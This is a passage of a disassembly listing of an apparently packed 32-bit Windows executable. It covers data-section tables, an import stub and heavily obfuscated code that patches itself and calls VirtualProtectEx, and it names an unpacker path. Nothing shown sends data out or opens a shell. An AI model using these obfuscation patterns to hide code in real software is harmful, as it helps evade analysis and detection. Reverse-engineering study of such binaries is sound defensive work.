off_428168	dd offset sub_44E9A8	; DATA XREF: sub_4057BF+10r
					; sub_405A96+3Dw ...
off_42816C	dd offset sub_44D997	; DATA XREF: sub_4058DA+44r
					; sub_405A96+4Aw ...
off_428170	dd offset sub_4468D0	; DATA XREF: sub_4057E9+Br
					; sub_405A96+5Ew ...
		align 8
dword_428178	dd 15CB48h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: sub_405E41+4o
					; .data:off_424800o
dword_428190	dd 15D2B8h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424808o
dword_4281A8	dd 15BF70h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424818o
		dd 15C758h, 0FFFFFFFFh,	4 dup(0)
dword_4281D8	dd 15B390h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424830o
		dd 15BF28h, 0FFFFFFFFh,	4 dup(0)
		dd 15D448h, 0FFFFFFFFh,	4 dup(0)
dword_428220	dd 15D470h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424850o
dword_428238	dd 15D498h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424860o
		dd 15D4C0h, 0FFFFFFFFh,	4 dup(0)
		dd 15D4E8h, 0FFFFFFFFh,	4 dup(0)
dword_428280	dd 15D510h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424880o
		dd 15D538h, 0FFFFFFFFh,	4 dup(0)
		dd 15D560h, 0FFFFFFFFh,	4 dup(0)
dword_4282C8	dd 0A20000h		; DATA XREF: sub_402FD3+7Cr
					; sub_403B91+62r ...
dword_4282CC	dd 0			; DATA XREF: sub_40609D+21w
					; sub_406110+21Cr ...
dword_4282D0	dd 0			; DATA XREF: sub_407CFA+14r
					; sub_407CFA+29r ...
dword_4282D4	dd 0			; DATA XREF: sub_40E632+19Er
dword_4282D8	dd 2			; DATA XREF: .text:004045AAw
					; sub_407EC6:loc_407EEEr ...
dword_4282DC	dd 0A28h		; DATA XREF: .text:004045C1w
dword_4282E0	dd 501h			; DATA XREF: .text:004045B0w
dword_4282E4	dd 5			; DATA XREF: .text:004045B5w
					; sub_407EFD+30r
dword_4282E8	dd 1			; DATA XREF: .text:004045BBw
dword_4282EC	dd 1			; DATA XREF: sub_40B414+A2w
dword_4282F0	dd 0A22BA8h		; DATA XREF: sub_40B414+A7w
		align 8
dword_4282F8	dd 0A22BC8h		; DATA XREF: sub_40B1A1+4Bw
					; sub_40B1A1:loc_40B266r ...
		dd 3 dup(0)
off_428308	dd offset aCM_unpackerPac ; DATA XREF: sub_40B414+37w
					; "C:\\m_unpacker\\packed.exe"
		align 10h
byte_428310	db 0			; DATA XREF: sub_407FCB+2Cw
					; sub_4086FB+5r
		align 4
dword_428314	dd 1			; DATA XREF: sub_407FCB+23w
dword_428318	dd 1			; DATA XREF: sub_407FCB+1Br
					; sub_407FCB+A0w
dword_42831C	dd 0			; DATA XREF: sub_408515+27o
dword_428320	dd 0			; DATA XREF: sub_408515+22r
dword_428324	dd 0			; DATA XREF: sub_408618+4w sub_408622r
dword_428328	dd 0			; DATA XREF: sub_4087BF+280w
					; sub_408CDB:loc_408D11w ...
		dd 3 dup(0)
dword_428338	dd 6 dup(0)		; DATA XREF: sub_40A074+66o
		db 0
byte_428351	db 3 dup(0)		; DATA XREF: sub_40A074+8Ao
		dd 40h dup(0)
		db 0
byte_428455	db 0			; DATA XREF: sub_40A074+92w
		align 4
		dd 7Dh dup(0)
dword_42864C	dd 0			; DATA XREF: sub_403C6E+80r
					; sub_40A074+E3o ...
dword_428650	dd 0			; DATA XREF: sub_40AC3F+8r
		align 8
aCM_unpackerPac	db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_40B414+1Do
					; .data:off_428308o
		align 4
		dd 3Ah dup(0)
byte_42875C	db 0			; DATA XREF: sub_40B414+24w
		align 10h
dword_428760	dd 1			; DATA XREF: sub_40B4CD+2r
					; sub_40B4CD+24w ...
dword_428764	dd 77C26E79h		; DATA XREF: sub_40B6DE+43r
					; sub_40B74A+11w ...
byte_428768	db 0			; DATA XREF: sub_40B6DE:loc_40B717r
					; sub_40B74A+17w ...
		align 4
off_42876C	dd offset sub_40C419	; DATA XREF: sub_40C465+Cr
					; sub_40C49C+Bw
dword_428770	dd 1			; DATA XREF: sub_40C517+14r
					; sub_40C517+3Aw ...
dword_428774	dd 1			; DATA XREF: sub_40C8FC+Fr
					; sub_40C8FC+37w ...
dword_428778	dd 0			; DATA XREF: .data:off_424F3Co
					; .data:off_424F40o ...
dword_42877C	dd 77E7C706h		; DATA XREF: sub_40D0BA+4w
					; sub_40D0D4+11r ...
dword_428780	dd 0			; DATA XREF: sub_40DB7D+Ar
dword_428784	dd 0			; DATA XREF: sub_40E28F+4w
					; sub_40E2E9:loc_40E332o ...
dword_428788	dd 0			; DATA XREF: sub_40E28F+9w
					; sub_40E2E9:loc_40E388o ...
dword_42878C	dd 0			; DATA XREF: sub_40E28F+Ew sub_40E2DCr ...
dword_428790	dd 0			; DATA XREF: sub_40E28F+13w
					; sub_40E2E9:loc_40E394o ...
		align 8
dword_428798	dd 0			; DATA XREF: sub_40E499+4w
		dd 2 dup(0)
dword_4287A4	dd 0			; DATA XREF: sub_40E4A3+4w
		dd 0Fh dup(0)
dword_4287E4	dd 0			; DATA XREF: sub_4087BF+6r
dword_4287E8	dd 0			; DATA XREF: sub_40FAE4+10r
					; sub_40FAE4+60w ...
dword_4287EC	dd 0			; DATA XREF: sub_40FAE4+75w
					; sub_40FAE4:loc_40FC32r
dword_4287F0	dd 0			; DATA XREF: sub_40FAE4+82w
					; sub_40FAE4+167r
dword_4287F4	dd 0			; DATA XREF: sub_40FAE4+D0w
					; sub_40FAE4:loc_40FBB9r
dword_4287F8	dd 0			; DATA XREF: sub_40FAE4+BAw
					; sub_40FAE4+E1r ...
		align 10h
dword_428800	dd 0			; DATA XREF: sub_40FD2B+Fw
		dd 2Fh dup(0)
dword_4288C0	dd 0			; DATA XREF: sub_410E49:loc_410E71r
byte_4288C4	db 0			; DATA XREF: sub_411014:loc_411150r
		align 4
dword_4288C8	dd 0			; DATA XREF: sub_41A67C+4Br
					; sub_41AB0C+E6w ...
dword_4288CC	dd 0			; DATA XREF: sub_41A5B4+14r
					; sub_41A618+14r ...
dword_4288D0	dd 0			; DATA XREF: sub_41A53E+1Dr
					; sub_41AB0C+136w ...
dword_4288D4	dd 0			; DATA XREF: sub_41A67C+1Cr
					; sub_41AB0C+AAw ...
dword_4288D8	dd 0			; DATA XREF: sub_41AB0C+BEw
					; sub_41AB0C+16Dr ...
dword_4288DC	dd 0			; DATA XREF: sub_41AB0C+D2w
					; sub_41AB0C+179r ...
dword_4288E0	dd 0			; DATA XREF: sub_41A5B4+34r
					; sub_41A618+34r ...
dword_4288E4	dd 0			; DATA XREF: sub_41A67C+63r
					; sub_41AB0C+FAw ...
dword_4288E8	dd 0			; DATA XREF: sub_41AB0C+14Aw
					; sub_41AB0C+322r
dword_4288EC	dd 0			; DATA XREF: sub_41AB0C+96w
					; sub_41AB0C+155r ...
dword_4288F0	dd 0			; DATA XREF: sub_41A5B4+4Dr
					; sub_41A618+4Dr ...
dword_4288F4	dd 0			; DATA XREF: sub_401DED+6Dr
					; sub_41979F+A9w ...
dword_4288F8	dd 0			; DATA XREF: sub_401DA7+23r
					; sub_402129+14Fr ...
dword_4288FC	dd 0			; DATA XREF: sub_401DA7+1Dr
					; sub_402129+149r ...
dword_428900	dd 0			; DATA XREF: sub_401DA7+17r
					; sub_402129+143r ...
dword_428904	dd 0			; DATA XREF: sub_401DA7+11r
					; sub_402129+13Dr ...
dword_428908	dd 0			; DATA XREF: sub_401DA7+Br
					; sub_402129+137r ...
dword_42890C	dd 0			; DATA XREF: sub_401DA7+5r
					; sub_402129+12Ar ...
dword_428910	dd 0			; DATA XREF: sub_4199DAr
					; sub_4199DA:loc_419A0Fw ...
dword_428914	dd 0			; DATA XREF: sub_4199DA+5r
					; sub_4199DA+3Bw ...
dword_428918	dd 0			; DATA XREF: sub_4199DA+15r
					; sub_419F7B+20w ...
dword_42891C	dd 0			; DATA XREF: sub_419F7B+25w
		dd 33h dup(0)
dword_4289EC	dd 2 dup(0)		; DATA XREF: sub_419F7B+43o
word_4289F4	dw 0			; DATA XREF: sub_418FDD+8o
					; sub_41979F+AEw ...
word_4289F6	dw 0			; DATA XREF: sub_41979F+D1w
dword_4289F8	dd 0			; DATA XREF: sub_41979F+BDw
		dd 2 dup(0)
dword_428A04	dd 0			; DATA XREF: sub_4198C0+6r
					; sub_4198C0+73r ...
dword_428A08	dd 41h dup(0)		; DATA XREF: sub_4191D2+1EDo
					; sub_4191D2+224o ...
dword_428B0C	dd 0			; DATA XREF: sub_418FDD+Dr
					; sub_41979F+84w ...
byte_428B10	db 0			; DATA XREF: sub_4191D2+293o
					; sub_4191D2+477o ...
		align 4
		dd 40h dup(0)
byte_428C14	db 0			; DATA XREF: .text:loc_40250Br
					; sub_41979F+117w ...
		align 4
dword_428C18	dd 41h dup(0)		; DATA XREF: sub_4191D2:loc_4193EFo
					; sub_41979F+1Ao
dword_428D1C	dd 0			; DATA XREF: sub_40177B+263o
					; sub_4019F3+215o ...
byte_428D20	db 0			; DATA XREF: sub_413FED+521r
					; sub_418F81:loc_418FB1r ...
		align 4
		dd 8 dup(0)
dword_428D44	dd 0			; DATA XREF: sub_41BF8C+33w
					; sub_41BF8C+8Fr ...
dword_428D48	dd 40h dup(0)		; DATA XREF: sub_41BD8A+49o
					; sub_41C12F+21o
dword_428E48	dd 0			; DATA XREF: sub_402086+Br
					; sub_4147B2+75w ...
		align 10h
byte_428E50	db 0			; DATA XREF: sub_402129+16Bo
					; sub_41B1F3+D7o ...
		align 4
		dd 3Fh dup(0)
dword_428F50	dd 0			; DATA XREF: sub_402129+170r
					; sub_41B1F3+45o
dword_428F54	dd 0			; DATA XREF: sub_402129+17Er
					; sub_41B1F3:loc_41B37Ew ...
byte_428F58	db 0			; DATA XREF: .text:0040295Bw
		align 4
		dd 3Fh dup(0)
dword_429058	dd 0			; DATA XREF: .text:004028EEr
					; .text:00402927w
		dd 3 dup(0)
		db 0
byte_429069	db 0			; DATA XREF: .text:loc_40262Ar
					; .text:00402A71w
		align 4
		dd 3 dup(0)
dword_429078	dd 0			; DATA XREF: .text:loc_402A4Br
		dd 1BF5h dup(0)
dword_430050	dd 1CCAh dup(0)		; DATA XREF: jlrllt49:0041FFCCo
					; jlrllt49:0041FFE8o
dword_437378	dd 0			; DATA XREF: sub_402AA2+A6r
					; sub_4191D2+501r ...
		db 0
byte_43737D	db 0			; DATA XREF: .text:004024E2r
					; sub_41BF8C:loc_41BFC8w ...
		align 10h
dword_437380	dd 0			; DATA XREF: sub_41BF8C+13Bw
dword_437384	dd 0			; DATA XREF: sub_402AA2+90r
					; sub_41BD8A:loc_41BEF8w ...
word_437388	dw 0			; DATA XREF: sub_401EF9+A6w
					; sub_401EF9+BAw
		align 10h
byte_437390	db 0			; DATA XREF: sub_414D82+9Fr
					; sub_414D82+1B4r ...
		align 4
		dd 31h dup(0)
		db 2 dup(0)
word_43745A	dw 0			; DATA XREF: sub_414FA3+56o
		dd 2Bh dup(0)
byte_437508	db 0			; DATA XREF: sub_414D82:loc_414DDDo
					; sub_414D82:loc_414E4Er ...
		db 2 dup(0)
byte_43750B	db 0			; DATA XREF: sub_414D82+119w
		dd 2 dup(0)
		db 2 dup(0)
byte_437516	db 0			; DATA XREF: sub_414D82+8Ew
					; sub_414D82+1A3w
		align 4
		db 2 dup(0)
byte_43751A	db 0			; DATA XREF: sub_414D82+94w
					; sub_414D82+1A9w
		align 10h
byte_437520	db 0			; DATA XREF: sub_414D82+A7w
					; sub_414D82+BFw ...
		align 4
		dd 56h dup(0)
dword_43767C	dd 0			; DATA XREF: sub_4182F6+110o
					; sub_41C75B+43o ...
dword_437680	dd 0			; DATA XREF: sub_4182F6+109r
					; sub_4182F6+122r ...
dword_437684	dd 0			; DATA XREF: sub_40121E+20r
					; sub_40121E:loc_40127Bw ...
dword_437688	dd 0			; DATA XREF: sub_401EF9+D3o
					; sub_402086+22o ...
dword_43768C	dd 0			; DATA XREF: sub_401EF9+C8r
					; sub_401EF9:loc_401FD9r ...
dword_437690	dd 0			; DATA XREF: sub_4016BA+20r
					; sub_4016BA:loc_401717w ...
off_437694	dd offset off_421C90	; DATA XREF: .text:0041D037o
					; .text:0041D041w
off_437698	dd offset off_421C88	; DATA XREF: .text:0041D01Bo
					; .text:0041D025w
off_43769C	dd offset off_421D0C	; DATA XREF: .text:0041D06Fo
					; .text:0041D079w
off_4376A0	dd offset off_421D14	; DATA XREF: .text:0041D08Bo
					; .text:0041D095w
off_4376A4	dd offset off_421D04	; DATA XREF: .text:0041D053o
					; .text:0041D05Dw
off_4376A8	dd offset off_421D78	; DATA XREF: .text:0041D0A7o
					; .text:0041D0B1w
off_4376AC	dd offset off_421D80	; DATA XREF: .text:0041D0C3o
					; .text:0041D0CDw
off_4376B0	dd offset off_421D88	; DATA XREF: .text:0041D0DFo
					; .text:0041D0E9w
off_4376B4	dd offset off_421DDC	; DATA XREF: .text:0041D117o
					; .text:0041D121w
off_4376B8	dd offset off_421DD4	; DATA XREF: .text:0041D0FBo
					; .text:0041D105w
off_4376BC	dd offset off_421E9C	; DATA XREF: .text:0041D133o
					; .text:0041D13Dw
off_4376C0	dd offset off_421EA4	; DATA XREF: .text:0041D14Fo
					; .text:0041D159w
off_4376C4	dd offset off_421ED0	; DATA XREF: .text:0041D16Bo
					; .text:0041D175w
dword_4376C8	dd 2080Ah		; DATA XREF: sub_41B423+472r
					; .text:0041D189w
off_4376CC	dd offset nullsub_449	; DATA XREF: .text:0041D1B1o
					; .text:0041D1BBw
off_4376D0	dd offset off_422030	; DATA XREF: .text:0041D1CDo
					; .text:0041D1D7w
off_4376D4	dd offset off_422020	; DATA XREF: .text:0041D195o
					; .text:0041D19Fw
dword_4376D8	dd 1			; DATA XREF: sub_404380r sub_40AEEFw ...
dword_4376DC	dd 1			; DATA XREF: sub_407930+28r
					; sub_408130+1Er ...
dword_4376E0	dd 0			; DATA XREF: sub_40AC3F+34r
dword_4376E4	dd 20h			; DATA XREF: sub_408DA0+3Cw
					; sub_408DA0+BFw ...
		dd 6 dup(0)
dword_437700	dd 0A220B0h		; DATA XREF: sub_406D96+FDr
					; sub_40864A+87r ...
		dd 3Fh dup(0)
dword_437800	dd 0A23188h		; DATA XREF: sub_40864A+2Bw
					; sub_40864A+44w ...
		dd 7 dup(0)
dword_437820	dd 400h	dup(0)		; DATA XREF: .data:off_424950o
					; .data:00424958o
dword_438820	dd 200h			; DATA XREF: sub_40864Ar
					; sub_40864A:loc_408664w ...
dword_438824	dd 0			; DATA XREF: sub_408125w
dword_438828	dd 1			; DATA XREF: sub_40B1A1+B3w
dword_43882C	dd 0A2310Ch		; DATA XREF: sub_403297+10r
					; sub_403297+9Bw ...
dword_438830	dd 0A23100h		; DATA XREF: sub_403297+5r
					; sub_403297+87w ...
dword_438834	dd 1			; DATA XREF: sub_4053C3r
					; sub_4053C3+11w ...
dword_438838	dd 0			; DATA XREF: sub_407F39:loc_407FA2r
					; sub_407F39+74o ...
dword_43883C	dd 0			; DATA XREF: sub_40609D+28w
					; sub_4060E5r ...
dword_438840	dd 0			; DATA XREF: sub_40609D+15w
					; sub_4060E5+6r ...
dword_438844	dd 0			; DATA XREF: sub_403C1F+13r
					; sub_40609D+36w ...
dword_438848	dd 0			; DATA XREF: sub_40609D+2Fw
					; sub_406110+2FCw ...
dword_43884C	dd 0			; DATA XREF: sub_40609D+3Cw
					; sub_406424r ...
dword_438850	dd 0			; DATA XREF: sub_406110+229r
					; sub_406110+249r ...
dword_438854	dd 1			; DATA XREF: sub_402FD3:loc_40300Cr
					; sub_403B91+13r ...
dword_438858	dd 152340h		; DATA XREF: .text:00404615w
					; sub_40B144:loc_40B155r ...
		align 800h
_data		ends

; Section 5. (virtual address 0003A000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00001000 (   4096.)
; Offset to raw	data for section: 0003A000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
lsjrwini	segment	para public 'DATA' use32
		assume cs:lsjrwini
		;org 43A000h
dword_43A000	dd 3A0CCh, 0		; DATA XREF: sub_48ED48+9o
		dd 0FFFFFFFFh, 3A03Ch, 3A0B4h, 3A108h, 0
		dd 0FFFFFFFFh, 3A0E8h, 3A104h, 5 dup(0)
aKernel32_dl_11	db 'kernel32.dll',0
		align 4
		dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
		dd 694C6461h, 72617262h, 4179h,	65470000h, 6F725074h, 64644163h
		dd 73736572h, 0
		dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
		dd 6C6C416Ch, 636Fh, 69560000h,	61757472h, 6572466Ch, 65h
		dd 77E79F93h, 77E805D8h, 77E7A5FDh, 77E75CB5h, 77E7980Ah
		dd 77E79E34h, 3A04Ch, 3A060h, 3A070h, 3A084h, 3A094h, 3A0A4h
		dd 0
aUser32_dll_1	db 'user32.dll',0
		align 4
		dd 654D0000h, 67617373h, 786F4265h, 41h, 77D6ADD7h, 3A0F4h
		dd 3BDh	dup(0)
lsjrwini	ends

; ---------------------------------------------------------------------------
; Section 6. (virtual address 0003B000)
; Virtual size			: 00022000 ( 139264.)
; Section size in file		: 00022000 ( 139264.)
; Offset to raw	data for section: 0003B000
; Flags	E0000020: Text Executable Readable Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
y2kk37jd	segment	para public 'CODE' use32
		assume cs:y2kk37jd
		;org 43B000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

loc_43B000:				; DATA XREF: ss.cste0:0046F8D4o
		mov	al, 1
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		jmp	loc_452395
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_384. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43B00E:				; CODE XREF: y2kk37jd:00453FA6j
		jmp	loc_4402A2
; ---------------------------------------------------------------------------

loc_43B013:				; CODE XREF: y2kk37jd:0045512Ej
		jz	loc_4492AC
; START	OF FUNCTION CHUNK FOR sub_448700

loc_43B019:				; CODE XREF: sub_448700+F67Fj
		jmp	loc_44C851
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_43B01E:				; CODE XREF: sub_43BD0D+1740Fj
		jmp	loc_445A48
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------

loc_43B023:				; CODE XREF: y2kk37jd:0044BF8Dj
		jmp	sub_4599BE
; ---------------------------------------------------------------------------
		jge	loc_43C856
		and	eax, 0CF907DD0h
		not	edx
		jmp	loc_4492AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_256. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDF4

loc_43B03C:				; CODE XREF: sub_43BDF4+15314j
		jmp	loc_44C13B
; END OF FUNCTION CHUNK	FOR sub_43BDF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A12

loc_43B041:				; CODE XREF: sub_448A12:loc_440318j
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_455EE9
		mov	ecx, [ebx+ecx+0Ch]
		jmp	loc_43BED6
; END OF FUNCTION CHUNK	FOR sub_448A12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_43B056:				; CODE XREF: sub_445787+BB9Bj
		add	edx, 0D786D905h
		mov	[edx], eax
		pop	edx
		lea	eax, sub_444899
		jmp	loc_450A63
; END OF FUNCTION CHUNK	FOR sub_445787

; =============== S U B	R O U T	I N E =======================================



sub_43B06A	proc near		; CODE XREF: sub_45689F-130CCp
					; y2kk37jd:0045C46Aj
		xchg	edx, [esp+0]
		pop	edx
		lea	eax, nullsub_14
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_14
sub_43B06A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43B07C:				; CODE XREF: y2kk37jd:0044D677j
		mov	eax, [esp]
		push	edx
		call	sub_4464B3
		push	0CB82DC95h
		jmp	loc_445FEA
; ---------------------------------------------------------------------------

loc_43B08F:				; DATA XREF: sub_44D3D0:loc_43E1A3o
		xor	edx, 0DB81F42Bh
		push	offset loc_44EF4C
		jmp	locret_44F4B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43B09F:				; CODE XREF: sub_43C851+9D41j
		push	7B3C96Ch
		pop	edx
		add	edx, 97F10247h
		rol	edx, 6
		add	edx, 1232F97Ah
		jmp	loc_44784A
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------

loc_43B0B9:				; CODE XREF: y2kk37jd:00440657j
		jbe	loc_450461

; =============== S U B	R O U T	I N E =======================================



sub_43B0BF	proc near		; CODE XREF: sub_44B814-ED1Cp

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		xchg	edx, [esp-4+arg_0]
		jmp	sub_442C3E
sub_43B0BF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43B0CB	proc near		; CODE XREF: y2kk37jd:004463BBp
					; y2kk37jd:00455F62j
		xchg	eax, [esp+0]
		pop	eax
		lea	eax, nullsub_321
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_321
sub_43B0CB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	sub_43C5D6	; VirtualProtectEx
; START	OF FUNCTION CHUNK FOR sub_447407

loc_43B0E2:				; CODE XREF: sub_447407+Cj
		jmp	loc_440EA2
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_43B0E7:				; CODE XREF: sub_44CEAB:loc_456DE1j
		push	edx
		push	eax
		mov	eax, [ebp-18h]
		shl	eax, 2
		cdq
		call	sub_44CEAB
; END OF FUNCTION CHUNK	FOR sub_44CEAB

; =============== S U B	R O U T	I N E =======================================



sub_43B0F5	proc near		; CODE XREF: sub_444D6F+7p
					; y2kk37jd:00456A8Bj

; FUNCTION CHUNK AT 0043B531 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F231 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F80C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044112B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C0F2 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0044EC3C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044F637 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FB17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004518CB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004520D7 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00454053 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454B51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458CA5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045943A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A768 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B6AD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045C359 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	eax, eax
		mov	[ebp-8], eax

loc_43B0FE:				; CODE XREF: sub_43B0F5:loc_45A768j
		js	loc_44C0FB
		mov	eax, [ebp-0Ch]
		jmp	loc_43F80C
sub_43B0F5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43B10C:				; CODE XREF: y2kk37jd:00441BF3j
		mov	eax, [esp]
		push	edx
		push	edx
		push	0E935EE6Bh
		pop	edx
		xor	edx, 49A42EAFh
		test	edx, 200000h
		jmp	loc_43DEC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_43B128:				; CODE XREF: sub_451464:loc_445F37j
		pop	ebp
		push	2CF10CBDh
		pop	eax
		add	eax, 0A9D6E06Ch
		jmp	loc_43C66F
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_43B13A:				; CODE XREF: sub_43C054:loc_442860j
					; sub_44723A+13B97j
		push	92685D76h
		add	eax, 809D0DDAh
		jmp	loc_459336
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C498

loc_43B14A:				; CODE XREF: sub_43C498:loc_4596C9j
		push	3D4937E0h

loc_43B14F:				; CODE XREF: sub_44B0D0+76A9j
		pop	eax
		sub	eax, 5C8204C9h
		add	eax, 89F1352Ah
		jmp	loc_44082B
; END OF FUNCTION CHUNK	FOR sub_43C498
; ---------------------------------------------------------------------------

loc_43B161:				; CODE XREF: y2kk37jd:0045569Fj
		mov	edx, edi

; =============== S U B	R O U T	I N E =======================================



sub_43B163	proc near		; CODE XREF: sub_43B163:loc_445670p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B16F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043C50D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E9D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442CFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443EFF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445670 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445848 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044620C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00448859 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004497F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E91B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F432 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454073 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045854F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00458DB7 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	byte ptr [eax],	0C3h
		jmp	loc_45854F
sub_43B163	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_43B16F:				; CODE XREF: sub_43B163+1D3F2j
		mov	eax, [esp-4+arg_0]
		jmp	loc_442CFC
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E120
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EA11

loc_43B17D:				; CODE XREF: y2kk37jd:0043E839j
					; sub_43EA11+199BBj
		jmp	sub_4464B3
; END OF FUNCTION CHUNK	FOR sub_43EA11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_500. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	[eax-78FFFE7Fh], bh
		sub	al, 24h
		push	offset sub_44F6F8
		jmp	locret_44B90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F7EA

loc_43B195:				; CODE XREF: sub_44F7EA:loc_4406C9j
		mov	eax, 150h
		call	sub_454413
		jmp	loc_4534D0
; END OF FUNCTION CHUNK	FOR sub_44F7EA
; ---------------------------------------------------------------------------
		pop	large dword ptr	fs:0
		add	esp, 4
		jmp	loc_4575F8
; ---------------------------------------------------------------------------
		or	edx, ebx
		add	edi, 872FD43Fh
		test	edi, ebx
		jmp	loc_442700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44704D

loc_43B1C2:				; CODE XREF: sub_44704D+Aj
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_459FF4
		jmp	loc_456483
; END OF FUNCTION CHUNK	FOR sub_44704D

; =============== S U B	R O U T	I N E =======================================



sub_43B1D6	proc near		; CODE XREF: y2kk37jd:loc_4441A6j
					; DATA XREF: y2kk37jd:0044419Co

; FUNCTION CHUNK AT 0043BB02 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043C5C3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043C720 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045C4C3 SIZE 00000005 BYTES

		mov	eax, edx
		call	sub_446819
		mov	eax, [esp+0]
		push	ebp
		jmp	loc_45C4C3
sub_43B1D6	endp


; =============== S U B	R O U T	I N E =======================================



sub_43B1E6	proc near		; CODE XREF: y2kk37jd:00444DC6j
					; y2kk37jd:004479D9p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044E78D SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_44E78D
sub_43B1E6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_43B1F2:				; CODE XREF: sub_43F770:loc_44C328j
		jz	loc_4440F5
		jmp	loc_43E7E1
; END OF FUNCTION CHUNK	FOR sub_43F770

; =============== S U B	R O U T	I N E =======================================



